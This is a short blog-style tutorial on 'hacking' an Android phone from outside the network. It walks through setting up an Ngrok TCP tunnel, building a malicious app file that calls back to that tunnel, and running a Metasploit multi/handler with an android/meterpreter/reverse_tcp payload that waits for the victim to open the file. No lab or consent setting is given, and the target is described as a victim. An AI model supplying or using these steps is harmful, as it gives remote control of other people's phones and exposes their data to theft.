ANDROID HACKING FROM OUTSIDE NETWORK

YAnil Sec
Oct 10, 2021

Hello everyone.Today i will explain how you can hack a Android device from outside network.Let’s start hack.

I will use Ngrok for hacking a device from outside network.First you should register Ngrok website.

After the login you should download Ngrok.

After the download i installed Ngrok

unzip <file-name>

./ngrok authtoken <token>

I created a TCP connection.

./ngrok tcp <port>

I can see my Ngrok address and port number.

I created my virus file and i used Ngrok address and port for LHOST and LPORT.Now i should go msfconsole and set my listener

set payload android/meterpreter/reverse_tcp

use exploit/multi/handler

set LPORT <port>

set LHOST 0.0.0.0

Now i can write “exploit” but victim should open virus file.

Thanks for read

--

--